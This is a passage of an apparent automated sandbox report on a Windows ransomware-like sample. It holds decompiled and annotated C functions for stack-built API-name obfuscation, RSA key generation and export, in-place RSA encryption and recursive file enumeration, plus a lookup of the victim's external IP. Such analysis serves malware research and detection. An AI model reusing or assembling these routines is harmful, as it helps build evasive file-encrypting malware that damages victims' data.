                                        						_v36 = 0x6d6f;
                                        						_v34 = 0;
                                        						_v32 = 0x61766441;
                                        						_v28 = 0x32336970;
                                        						_v24 = 0x6c6c642e;
                                        						_v20 = 0;
                                        						_t45 = GetModuleHandleA( &_v32);
                                        						if(_t45 != 0) {
                                        							L7:
                                        							_t19 =  &_v48; // 0x70797243
                                        							_t46 = GetProcAddress(_t45, _t19);
                                        							if(_t46 == 0) {
                                        								goto L13;
                                        							} else {
                                        								_push(_t64);
                                        								_push(_t63);
                                        								_push(_v8);
                                        								if( *_t46() == 0) {
                                        									goto L13;
                                        								} else {
                                        									_t60 = 0;
                                        									if(_t63 != 0) {
                                        										_t56 = _v12;
                                        										_v16 = 0x1a;
                                        										do {
                                        											asm("cdq");
                                        											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                        											_t60 = _t60 + 1;
                                        										} while (_t60 < _t63);
                                        									}
                                        									_t54 = 1;
                                        								}
                                        							}
                                        						} else {
                                        							_t18 =  &_v32; // 0x61766441
                                        							_t45 = LoadLibraryA(_t18);
                                        							if(_t45 == 0) {
                                        								L13:
                                        								_t54 = 0;
                                        							} else {
                                        								goto L7;
                                        							}
                                        						}
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t64, 0, 0x8000);
                                        						goto L15;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                        • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8277
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction ID: da1cbb7ee9285fb786599efd7a496e4bd1b62b50363972ba320919c10a7655e4
                                        • Opcode Fuzzy Hash: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction Fuzzy Hash: BC31F874A05209ABEB208FE5DC49BEEBB7CEF05751F308069FA01E6182D7749621CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        #include <windows.h>
                                        #include <wincrypt.h>

                                        /* Fills the caller's buffer (__ecx) with __edx random bytes. CryptGenRandom is
                                           not imported: the module and API names are assembled on the stack from 32-bit
                                           immediates and resolved with GetModuleHandleA/LoadLibraryA + GetProcAddress,
                                           so neither string appears in the binary's string table.
                                           Returns 1 on success, 0 otherwise. */
                                        int E0F9D82A0(BYTE* __ecx, DWORD __edx) {
                                        	HCRYPTPROV _v8;            /* CSP handle */
                                        	DWORD _v12;                /* requested length */
                                        	BYTE* _v16;                /* output buffer */
                                        	char _v32[16];             /* "Advapi32.dll", built below */
                                        	char _v48[16];             /* "CryptGenRandom", built below */
                                        	char _v56[0x1a];           /* 'a'..'z' table, written but never read */
                                        	HMODULE _t33;
                                        	BOOL (WINAPI *_t34)(HCRYPTPROV, DWORD, BYTE*);   /* resolved CryptGenRandom */
                                        	DWORD _t40;
                                        	DWORD _t42;
                                        	int _t46 = 0;
                                        	void* _t47;

                                        	_v16 = __ecx;
                                        	_v12 = __edx;
                                        	/* PROV_RSA_FULL (1), CRYPT_VERIFYCONTEXT (0xF0000000): ephemeral context, no key container */
                                        	if(CryptAcquireContextW(&_v8, 0, 0, 1, 0xf0000000) == 0) {
                                        		return _t46;
                                        	}
                                        	for(_t42 = 0; _t42 < 0x1a; _t42++) {
                                        		_v56[_t42] = (char)(_t42 + 0x61);   /* 'a' + i */
                                        	}
                                        	_t40 = __edx + 1;
                                        	/* MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40); the buffer is not used further */
                                        	_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
                                        	if(_t47 == 0 || _v12 >= _t40) {   /* second test only fails on __edx + 1 wrapping to 0 */
                                        		CryptReleaseContext(_v8, 0);
                                        		VirtualFree(_t47, 0, 0x8000);  /* MEM_RELEASE */
                                        		return 0;
                                        	}
                                        	*(DWORD*)(_v48 + 0)  = 0x70797243;   /* "Cryp" */
                                        	*(DWORD*)(_v48 + 4)  = 0x6e654774;   /* "tGen" */
                                        	*(DWORD*)(_v48 + 8)  = 0x646e6152;   /* "Rand" */
                                        	*(WORD*) (_v48 + 12) = 0x6d6f;       /* "om"   */
                                        	_v48[14] = 0;
                                        	*(DWORD*)(_v32 + 0)  = 0x61766441;   /* "Adva" */
                                        	*(DWORD*)(_v32 + 4)  = 0x32336970;   /* "pi32" */
                                        	*(DWORD*)(_v32 + 8)  = 0x6c6c642e;   /* ".dll" */
                                        	_v32[12] = 0;
                                        	_t33 = GetModuleHandleA(_v32);
                                        	if(_t33 == 0) {
                                        		_t33 = LoadLibraryA(_v32);
                                        	}
                                        	if(_t33 != 0) {
                                        		_t34 = (BOOL (WINAPI *)(HCRYPTPROV, DWORD, BYTE*))GetProcAddress(_t33, _v48);
                                        		if(_t34 != 0) {
                                        			/* CryptGenRandom(hProv, dwLen, pbBuffer); nonzero means the buffer was filled */
                                        			if(_t34(_v8, _v12, _v16) != 0) {
                                        				_t46 = 1;
                                        			}
                                        		}
                                        	}
                                        	CryptReleaseContext(_v8, 0);
                                        	VirtualFree(_t47, 0, 0x8000);
                                        	return _t46;
                                        }

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                        • VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction ID: 210382d2c5051aeefabdf87173a93d34e64520cb74e5883e852665db8d95455a
                                        • Opcode Fuzzy Hash: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction Fuzzy Hash: 3B31F871A05209AFEB20DFA5DC49BEEBB7CEF05711F204059F605E2182D7789A20CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        #include <windows.h>
                                        #include <wincrypt.h>

                                        /* Imports an RSA key blob (_a4, _a8 bytes long) into the "Microsoft Enhanced
                                           Cryptographic Provider v1.0" and RSA-encrypts the buffer at _a12 in place
                                           (_a16 = in/out data length, preset to 0xc8 = 200 bytes; _a20 = buffer size).
                                           Calls are serialised through the critical section at 0xf9e2a48.
                                           Returns the CryptEncrypt result, 0 on failure. */
                                        int E0F9D6530(BYTE* _a4, DWORD _a8, BYTE* _a12, DWORD* _a16, DWORD _a20) {
                                        	HCRYPTPROV _v8 = 0;
                                        	HCRYPTKEY _v12 = 0;
                                        	int _v16 = 0;
                                        	DWORD _v20;       /* size of the KP_BLOCKLEN output buffer */
                                        	DWORD _v24;       /* last error captured after CryptEncrypt */
                                        	DWORD _v28;       /* block length returned by CryptGetKeyParam */
                                        	DWORD _t36;

                                        	EnterCriticalSection((LPCRITICAL_SECTION)0xf9e2a48);
                                        	if(CryptAcquireContextW(&_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0) == 0) {
                                        		_t36 = GetLastError();
                                        		if(_t36 != 0x80090016) {   /* NTE_BAD_KEYSET: no default container yet */
                                        			return 0;              /* as decompiled: the critical section is not released on this path */
                                        		}
                                        		/* CRYPT_NEWKEYSET (8): create the container and retry */
                                        		if(CryptAcquireContextW(&_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8) == 0) {
                                        			return 0;
                                        		}
                                        	}
                                        	if(CryptImportKey(_v8, _a4, _a8, 0, 0, &_v12) != 0) {
                                        		_v20 = 0xa;
                                        		/* KP_BLOCKLEN (8): the queried block length is stored but not used */
                                        		CryptGetKeyParam(_v12, 8, (BYTE*)&_v28, &_v20, 0);
                                        		*_a16 = 0xc8;
                                        		/* hHash 0, Final TRUE, dwFlags 0 */
                                        		_v16 = CryptEncrypt(_v12, 0, 1, 0, _a12, _a16, _a20);
                                        		_v24 = GetLastError();
                                        		if(_v16 == 0) {
                                        			E0F9D34F0(_t34);   /* error routine elsewhere in the sample; argument not recovered by the decompiler */
                                        		}
                                        	}
                                        	CryptReleaseContext(_v8, 0);   /* the imported key handle is not destroyed */
                                        	LeaveCriticalSection((LPCRITICAL_SECTION)0xf9e2a48);
                                        	return _v16;
                                        }

                                        APIs
                                        • EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D65B9
                                        • CryptGetKeyParam.ADVAPI32(00000000,00000008,0F9D3724,0000000A,00000000,?,0F9D3724,00000000), ref: 0F9D65DA
                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F9D3724,?,0F9D3724,00000000), ref: 0F9D6602
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000), ref: 0F9D660B
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D6628
                                        • LeaveCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000), ref: 0F9D6633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 72144047-1948191093
                                        • Opcode ID: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction ID: b93ff390acc2f02cb71f1f880095a8752a233601122ff60c9f66d648c7cb098d
                                        • Opcode Fuzzy Hash: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction Fuzzy Hash: 52314F75A44309BFEB20CFA0DD45FEE77B8AB49701F608548F601AA1C1DB79A660CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        #include <windows.h>
                                        #include <wincrypt.h>

                                        /* Generates a fresh 2048-bit RSA key-exchange pair (CALG_RSA_KEYX = 0xa400;
                                           dwFlags 0x8000001 = key length 2048 << 16 | CRYPT_EXPORTABLE), exports the
                                           public blob (PUBLICKEYBLOB, 6) to _a4/_a8 and the private blob
                                           (PRIVATEKEYBLOB, 7) to _a12/_a16, then destroys the key and deletes the
                                           key container (CRYPT_DELETEKEYSET = 0x10) so no copy remains in the CSP.
                                           Returns 1 on success, 0 if no provider context could be acquired. */
                                        int E0F9D62B0(BYTE* _a4, DWORD* _a8, BYTE* _a12, DWORD* _a16) {
                                        	HCRYPTPROV _v8 = 0;
                                        	HCRYPTKEY _v12 = 0;
                                        	int _v16;
                                        	DWORD _t23;

                                        	if(CryptAcquireContextW(&_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0) == 0) {
                                        		_t23 = GetLastError();
                                        		if(_t23 != 0x80090016) {   /* NTE_BAD_KEYSET */
                                        			return 0;
                                        		}
                                        		/* CRYPT_NEWKEYSET (8): create the container and retry */
                                        		if(CryptAcquireContextW(&_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8) == 0) {
                                        			return 0;
                                        		}
                                        	}
                                        	/* The sample does not act on a CryptGenKey failure; the empty branch is kept as decompiled. */
                                        	if(CryptGenKey(_v8, 0xa400, 0x8000001, &_v12) == 0) {
                                        	}
                                        	_v16 = 0;
                                        	CryptExportKey(_v12, 0, 6, 0, _a4, _a8);     /* PUBLICKEYBLOB */
                                        	CryptExportKey(_v12, 0, 7, 0, _a12, _a16);   /* PRIVATEKEYBLOB */
                                        	CryptDestroyKey(_v12);
                                        	CryptReleaseContext(_v8, 0);
                                        	/* CRYPT_DELETEKEYSET (0x10): remove the container; the handle result is ignored */
                                        	CryptAcquireContextW(&_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
                                        	return 1;
                                        }

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0F9D49C6,?,0F9D49CE), ref: 0F9D62C5
                                        • GetLastError.KERNEL32(?,0F9D49CE), ref: 0F9D62CF
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D49CE), ref: 0F9D62EB
                                        • CryptGenKey.ADVAPI32(0F9D49CE,0000A400,08000001,?,?,0F9D49CE), ref: 0F9D6317
                                        • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F9D633B
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F9D6353
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0F9D635D
                                        • CryptReleaseContext.ADVAPI32(0F9D49CE,00000000), ref: 0F9D6369
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F9D637E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 137402220-1948191093
                                        • Opcode ID: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction ID: 1f5514a9c9bdc8d3f6e7b4d77255958fbdba67b62d9a96974f9b763613daa586
                                        • Opcode Fuzzy Hash: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction Fuzzy Hash: F6219F75784309BBEB20CFA0DD4AFDE777DAB59B12F208504F701EA1C1C6B9A5609B60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0F9D6EAF
                                        • lstrlenW.KERNEL32(0F9DFF0C), ref: 0F9D6EBC
                                          • Part of subcall function 0F9D7EF0: InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                          • Part of subcall function 0F9D7EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6EEB
                                        • wsprintfW.USER32 ref: 0F9D6F03
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6F19
                                        • InternetCloseHandle.WININET(?), ref: 0F9D6F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                        • String ID: GET$ipv4bot.whatismyipaddress.com
                                        • API String ID: 4289327240-2259699238
                                        • Opcode ID: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction ID: 5f71e2370dd9b9bb2034459d66c42b2ab8eff49ec4b75280de9756b4624c85b0
                                        • Opcode Fuzzy Hash: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction Fuzzy Hash: 4B01F93174520437EB206A6A9D4EF9B3E2CEBC6B51F308020FA05E10C3DE685165C6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D6C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                        				void* _v12;
                                        				intOrPtr _v16;
                                        				WCHAR* _v20;
                                        				intOrPtr _v24;
                                        				struct _WIN32_FIND_DATAW _v616;
                                        				void* _t35;
                                        				signed int _t37;
                                        				int _t39;
                                        				signed int _t42;
                                        				void* _t46;
                                        				signed int* _t48;
                                        				WCHAR* _t53;
                                        				intOrPtr* _t54;
                                        				short _t57;
                                        				WCHAR* _t63;
                                        				void* _t67;
                                        
                                        				_v24 = __edx;
                                        				_t63 = __ecx;
                                        				"SVWj@h"();
                                        				if(__eax == 0 || E0F9D6A40(__ecx) != 0) {
                                        					L17:
                                        					__eflags = 0;
                                        					return 0;
                                        				} else {
                                        					E0F9D6BE0(__ecx);
                                        					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                        					_v20 = _t53;
                                        					lstrcatW(_t63, "*");
                                        					_t35 = FindFirstFileW(_t63,  &_v616);
                                        					_t57 = 0;
                                        					_v12 = _t35;
                                        					 *_t53 = 0;
                                        					if(_t35 != 0xffffffff) {
                                        						_t54 = _a12;
                                        						do {
                                        							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                        							__eflags = _t37;
                                        							if(_t37 != 0) {
                                        								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                        								__eflags = _t42;
                                        								if(_t42 != 0) {
                                        									lstrcatW(_t63,  &(_v616.cFileName));
                                        									__eflags = _v616.dwFileAttributes & 0x00000010;
                                        									if(__eflags == 0) {
                                        										_v16 =  *_t54;
                                        										_t46 = E0F9D6950(_t63,  &_v616, __eflags, _t57, _a4);
                                        										_t67 = _t67 + 8;
                                        										 *_t54 =  *_t54 + _t46;
                                        										asm("adc [ebx+0x4], edx");
                                        										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                        										if(__eflags <= 0) {
                                        											if(__eflags < 0) {
                                        												L12:
                                        												_t48 = _a8;
                                        												 *_t48 =  *_t48 + 1;
                                        												__eflags =  *_t48;
                                        											} else {
                                        												__eflags = _v16 -  *_t54;
                                        												if(_v16 <  *_t54) {
                                        													goto L12;
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										E0F9D6C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                        										_t67 = _t67 + 0xc;
                                        									}
                                        									_t57 = 0;
                                        									__eflags = 0;
                                        									 *_v20 = 0;
                                        								}
                                        							}
                                        							_t39 = FindNextFileW(_v12,  &_v616);
                                        							__eflags = _t39;
                                        						} while (_t39 != 0);
                                        						FindClose(_v12);
                                        						goto L17;
                                        					} else {
                                        						return 0xdeadbeaf;
                                        					}
                                        				}
                                        			}

                                        APIs
                                          • Part of subcall function 0F9D6640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                          • Part of subcall function 0F9D6640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                          • Part of subcall function 0F9D6A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                          • Part of subcall function 0F9D6A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                          • Part of subcall function 0F9D6A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                          • Part of subcall function 0F9D6A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                          • Part of subcall function 0F9D6A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                          • Part of subcall function 0F9D6BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                          • Part of subcall function 0F9D6BE0: wsprintfW.USER32 ref: 0F9D6C03
                                          • Part of subcall function 0F9D6BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                          • Part of subcall function 0F9D6BE0: GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                          • Part of subcall function 0F9D6BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                        • String ID:
                                        • API String ID: 1112924665-0
                                        • Opcode ID: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction ID: 32feab062f61293210968fe358081b6120d426da6fd40f9b3eb50eeadd85a6f7
                                        • Opcode Fuzzy Hash: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction Fuzzy Hash: A131D531A04219ABDF10AF64EC84AAD77BCEF85310F24C1A6F905E7183DB34AA54DF60
